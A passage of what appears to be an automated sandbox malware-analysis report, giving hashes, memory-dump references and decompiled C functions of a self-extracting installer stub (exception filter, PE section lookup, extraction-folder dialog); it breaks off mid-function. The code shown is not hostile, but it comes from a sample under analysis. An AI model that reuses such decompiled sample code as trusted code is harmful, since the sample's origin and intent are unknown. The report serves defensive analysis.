                                                                                                                                                                                                                                      • Instruction ID: 8cb3f13b78dd38f3b5ff2bea80fcfbd25beb2721d0077c0a29712bb6dc75ce69
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87D0C932000308BBDB002BE1EE0CE593F28EB48212F444020F719AA020CA3244618B5B
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00406EE0() {
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				SetUnhandledExceptionFilter(E00406E90);
                                                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                                                      			}



                                                                                                                                                                                                                                      0x00406ee5
                                                                                                                                                                                                                                      0x00406eed

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00006E90), ref: 00406EE5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                      • Opcode ID: 174873a97579ed3a1250c98f6a9bec23ed9b488b7d8360a49119f30f0e3c24e0
                                                                                                                                                                                                                                      • Instruction ID: 43ef4c86efebb448a778602e4ecd74a6aaa5c5574d6be4b81bb608dff660d0f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 174873a97579ed3a1250c98f6a9bec23ed9b488b7d8360a49119f30f0e3c24e0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA90027825130046D6101F70DE0990D65A15F4D602BD25475A012E8094DB74506055AA
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00406FC0(intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                                                      				intOrPtr _t19;
                                                                                                                                                                                                                                      				intOrPtr _t20;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t8 = _a4;
                                                                                                                                                                                                                                      				_t18 = 0;
                                                                                                                                                                                                                                      				_t2 = _t8 + 0x3c; // 0xe0
                                                                                                                                                                                                                                      				_t15 =  *_t2 + _a4;
                                                                                                                                                                                                                                      				_t13 =  *(_t15 + 6) & 0x0000ffff;
                                                                                                                                                                                                                                      				_t11 = ( *(_t15 + 0x14) & 0x0000ffff) + 0x18 + _t15;
                                                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t5 =  &_a8; // 0x407070
                                                                                                                                                                                                                                      				_t19 =  *_t5;
                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                      					_t20 =  *((intOrPtr*)(_t11 + 0xc));
                                                                                                                                                                                                                                      					if(_t19 >= _t20 && _t19 <  *((intOrPtr*)(_t11 + 8)) + _t20) {
                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t18 = _t18 + 1;
                                                                                                                                                                                                                                      					_t11 = _t11 + 0x28;
                                                                                                                                                                                                                                      					if(_t18 < _t13) {
                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return _t11;
                                                                                                                                                                                                                                      				goto L7;
                                                                                                                                                                                                                                      			}









                                                                                                                                                                                                                                      0x00406fc5
                                                                                                                                                                                                                                      0x00406fc8
                                                                                                                                                                                                                                      0x00406fcd
                                                                                                                                                                                                                                      0x00406fd0
                                                                                                                                                                                                                                      0x00406fd6
                                                                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                                                                      0x00406fe1
                                                                                                                                                                                                                                      0x00406ffe
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406ffe
                                                                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                                                                      0x00406fe6
                                                                                                                                                                                                                                      0x00406fe6
                                                                                                                                                                                                                                      0x00406feb
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406ff6
                                                                                                                                                                                                                                      0x00406ff7
                                                                                                                                                                                                                                      0x00406ffc
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406ffc
                                                                                                                                                                                                                                      0x00407004
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: pp@
                                                                                                                                                                                                                                      • API String ID: 0-4065560868
                                                                                                                                                                                                                                      • Opcode ID: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                                                                                                                                                                                      • Instruction ID: 845dd5fbcd89926ba6a9ef018f2806095bed2837f9289c373055d7794f6dcd6b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7337001155BCB548B4EED80A7AB3DADFC473831A807AE40597252DA38EC528298
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                                                      			E00403200(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                                                      				int _t20;
                                                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                                                                      				char _t24;
                                                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                                                      				int _t38;
                                                                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                                                      				CHAR* _t49;
                                                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                                                      				struct HWND__* _t64;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                                                                                                      				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                                                      					EndDialog(_t64, ??);
                                                                                                                                                                                                                                      					L39:
                                                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t42 = 1;
                                                                                                                                                                                                                                      				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                                                                                                      					E004043AE(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                      					SetWindowTextA(_t64, "OxZQ");
                                                                                                                                                                                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                      					__eflags =  *0x409a40 - _t42; // 0x3
                                                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					L36:
                                                                                                                                                                                                                                      					return _t42;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(_t10 == _t42) {
                                                                                                                                                                                                                                      					_t20 = _a12 - 1;
                                                                                                                                                                                                                                      					__eflags = _t20;
                                                                                                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                                                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0x4091e4, 0x104);
                                                                                                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                                                      							_t58 = 0x4bf;
                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                                                      							E00404495(_t64, _t58);
                                                                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t49 = 0x4091e4;
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t23 =  *_t49;
                                                                                                                                                                                                                                      							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                                                      						} while (_t23 != 0);
                                                                                                                                                                                                                                      						__eflags = _t49 - 0x4091e5 - 3;
                                                                                                                                                                                                                                      						if(_t49 - 0x4091e5 < 3) {
                                                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t24 =  *0x4091e5; // 0x3a
                                                                                                                                                                                                                                      						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                      						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                      							L21:
                                                                                                                                                                                                                                      							_t25 = GetFileAttributesA(0x4091e4);
                                                                                                                                                                                                                                      							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                      							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                                                      								E00406534(0x4091e4, 0x104, 0x401140);
                                                                                                                                                                                                                                      								_t27 = E00405880(0x4091e4);
                                                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                                                                      									__eflags =  *0x4091e4 - 0x5c;
                                                                                                                                                                                                                                      									if( *0x4091e4 != 0x5c) {
                                                                                                                                                                                                                                      										L30:
                                                                                                                                                                                                                                      										_t30 = E00405933(0x4091e4, 1, _t64, 1);
                                                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                                                      											_t42 = 1;
                                                                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                                                                      											goto L36;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                                                      										_t42 = 1;
                                                                                                                                                                                                                                      										EndDialog(_t64, 1);
                                                                                                                                                                                                                                      										goto L36;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									__eflags =  *0x4091e5 - 0x5c;
                                                                                                                                                                                                                                      									if( *0x4091e5 == 0x5c) {
                                                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                      								_t58 = 0x4be;
                                                                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t32 = E00404495(_t64, 0x54a, 0x4091e4, 0, 0x20, 4);
                                                                                                                                                                                                                                      							__eflags = _t32 - 6;
                                                                                                                                                                                                                                      							if(_t32 != 6) {
                                                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t33 = CreateDirectoryA(0x4091e4, 0);
                                                                                                                                                                                                                                      							__eflags = _t33;
                                                                                                                                                                                                                                      							if(_t33 != 0) {
                                                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                      							_push(0x4091e4);
                                                                                                                                                                                                                                      							_t58 = 0x4cb;
                                                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						__eflags =  *0x4091e4 - 0x5c;
                                                                                                                                                                                                                                      						if( *0x4091e4 != 0x5c) {
                                                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                      						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t34 = _t20 - 1;
                                                                                                                                                                                                                                      					__eflags = _t34;
                                                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                                                      						EndDialog(_t64, 0);
                                                                                                                                                                                                                                      						 *0x409124 = 0x800704c7;
                                                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                      					if(_t34 != 0x834) {
                                                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t37 = LoadStringA( *0x409a3c, 0x3e8, 0x408598, 0x200);
                                                                                                                                                                                                                                      					__eflags = _t37;
                                                                                                                                                                                                                                      					if(_t37 != 0) {
                                                                                                                                                                                                                                      						_t38 = E00404204(_t64, _t46, _t46);
                                                                                                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0x4087a0);
                                                                                                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                                                                                                      						if(_t39 != 0) {
                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t63 = 0x4c0;
                                                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                                                      						E00404495(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                                                      						goto L38;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t63 = 0x4b1;
                                                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                                                      			}

























                                                                                                                                                                                                                                      0x0040320b
                                                                                                                                                                                                                                      0x0040320e
                                                                                                                                                                                                                                      0x00403211
                                                                                                                                                                                                                                      0x0040342c
                                                                                                                                                                                                                                      0x0040342e
                                                                                                                                                                                                                                      0x0040342f
                                                                                                                                                                                                                                      0x00403435
                                                                                                                                                                                                                                      0x00403437
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403437
                                                                                                                                                                                                                                      0x00403219
                                                                                                                                                                                                                                      0x0040321a
                                                                                                                                                                                                                                      0x0040321f
                                                                                                                                                                                                                                      0x004033dc
                                                                                                                                                                                                                                      0x004033e7
                                                                                                                                                                                                                                      0x00403400
                                                                                                                                                                                                                                      0x00403406
                                                                                                                                                                                                                                      0x0040340d
                                                                                                                                                                                                                                      0x0040341d
                                                                                                                                                                                                                                      0x0040341d
                                                                                                                                                                                                                                      0x00403428
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403428
                                                                                                                                                                                                                                      0x00403227
                                                                                                                                                                                                                                      0x00403233
                                                                                                                                                                                                                                      0x00403233
                                                                                                                                                                                                                                      0x00403236
                                                                                                                                                                                                                                      0x004032de
                                                                                                                                                                                                                                      0x004032e4
                                                                                                                                                                                                                                      0x004032e6
                                                                                                                                                                                                                                      0x004033c4
                                                                                                                                                                                                                                      0x004033c6
                                                                                                                                                                                                                                      0x004033cb
                                                                                                                                                                                                                                      0x004033cc
                                                                                                                                                                                                                                      0x004033ce
                                                                                                                                                                                                                                      0x004033cf
                                                                                                                                                                                                                                      0x00403360
                                                                                                                                                                                                                                      0x00403362
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403362
                                                                                                                                                                                                                                      0x004032ec
                                                                                                                                                                                                                                      0x004032f1
                                                                                                                                                                                                                                      0x004032f1
                                                                                                                                                                                                                                      0x004032f3
                                                                                                                                                                                                                                      0x004032f4
                                                                                                                                                                                                                                      0x004032f4
                                                                                                                                                                                                                                      0x004032fa
                                                                                                                                                                                                                                      0x004032fd
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403303
                                                                                                                                                                                                                                      0x00403308
                                                                                                                                                                                                                                      0x0040330a
                                                                                                                                                                                                                                      0x00403321
                                                                                                                                                                                                                                      0x00403322
                                                                                                                                                                                                                                      0x0040332a
                                                                                                                                                                                                                                      0x0040332d
                                                                                                                                                                                                                                      0x0040336c
                                                                                                                                                                                                                                      0x00403378
                                                                                                                                                                                                                                      0x0040337f
                                                                                                                                                                                                                                      0x00403384
                                                                                                                                                                                                                                      0x00403386
                                                                                                                                                                                                                                      0x00403394
                                                                                                                                                                                                                                      0x0040339b
                                                                                                                                                                                                                                      0x004033a6
                                                                                                                                                                                                                                      0x004033ae
                                                                                                                                                                                                                                      0x004033b3
                                                                                                                                                                                                                                      0x004033b5
                                                                                                                                                                                                                                      0x00403425
                                                                                                                                                                                                                                      0x00403427
                                                                                                                                                                                                                                      0x00403427
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403427
                                                                                                                                                                                                                                      0x004033b7
                                                                                                                                                                                                                                      0x004033b9
                                                                                                                                                                                                                                      0x004033bc
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004033bc
                                                                                                                                                                                                                                      0x0040339d
                                                                                                                                                                                                                                      0x004033a4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004033a4
                                                                                                                                                                                                                                      0x00403388
                                                                                                                                                                                                                                      0x00403389
                                                                                                                                                                                                                                      0x0040338b
                                                                                                                                                                                                                                      0x0040338c
                                                                                                                                                                                                                                      0x0040338d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040338d
                                                                                                                                                                                                                                      0x0040333c
                                                                                                                                                                                                                                      0x00403341
                                                                                                                                                                                                                                      0x00403344
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040334c
                                                                                                                                                                                                                                      0x00403352
                                                                                                                                                                                                                                      0x00403354
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403356
                                                                                                                                                                                                                                      0x00403357
                                                                                                                                                                                                                                      0x00403359
                                                                                                                                                                                                                                      0x0040335a
                                                                                                                                                                                                                                      0x0040335b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040335b
                                                                                                                                                                                                                                      0x0040330c
                                                                                                                                                                                                                                      0x00403313
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403319
                                                                                                                                                                                                                                      0x0040331b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040331b
                                                                                                                                                                                                                                      0x0040323c
                                                                                                                                                                                                                                      0x0040323c
                                                                                                                                                                                                                                      0x0040323f
                                                                                                                                                                                                                                      0x004032b8
                                                                                                                                                                                                                                      0x004032be
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004032be
                                                                                                                                                                                                                                      0x00403241
                                                                                                                                                                                                                                      0x00403246
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403261
                                                                                                                                                                                                                                      0x00403267
                                                                                                                                                                                                                                      0x00403269
                                                                                                                                                                                                                                      0x00403288
                                                                                                                                                                                                                                      0x0040328d
                                                                                                                                                                                                                                      0x0040328f
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004032a0
                                                                                                                                                                                                                                      0x004032a6
                                                                                                                                                                                                                                      0x004032a8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004032ae
                                                                                                                                                                                                                                      0x00403270
                                                                                                                                                                                                                                      0x00403279
                                                                                                                                                                                                                                      0x0040327e
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040327e
                                                                                                                                                                                                                                      0x0040326b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040326b
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadStringA.USER32(000003E8,00408598,00000200), ref: 00403261
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004033D2
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,OxZQ), ref: 004033E7
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00403400
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000836), ref: 00403416
                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 0040341D
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 0040342F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$OxZQ
                                                                                                                                                                                                                                      • API String ID: 2418873061-2967087303
                                                                                                                                                                                                                                      • Opcode ID: 181c29c7f381bb92591cb1ad06488cae3c73acd83e5a61bc9bd0fd8920ea3039
                                                                                                                                                                                                                                      • Instruction ID: b1f04f69c81171ac720cfec9147651a3a8b8a9744171d9d6e423784ee8879619
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 181c29c7f381bb92591cb1ad06488cae3c73acd83e5a61bc9bd0fd8920ea3039
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F510470340241BBE7229F355D8DF7B2D5DDB8AB46F50403AF646B92D1CABC8E02926D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                                                      			E00404204(char __ecx) {
                                                                                                                                                                                                                                      				char* _v8;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                      				char* _v28;
                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                                                      				char* _t61;
                                                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                                                      				char* _t65;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                                                      				char _t76;
                                                                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                                                                                                                      					_t63 = 0x4c2;
                                                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                                                      					E00404495(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                      				_v12 = _t26;
                                                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                                                      					_t63 = 0x4c1;
                                                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                      				_v20 = _t28;
                                                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                      				_v16 = _t29;
                                                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t76 =  *0x4088c0; // 0x0
                                                                                                                                                                                                                                      				if(_t76 != 0) {
                                                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                                                      					 *0x4087a0 = 0;
                                                                                                                                                                                                                                      					_v52 = _t67;
                                                                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                                                                      					_v44 = 0;
                                                                                                                                                                                                                                      					_v40 = 0x408598;
                                                                                                                                                                                                                                      					_v36 = 1;
                                                                                                                                                                                                                                      					_v32 = E004041E0;
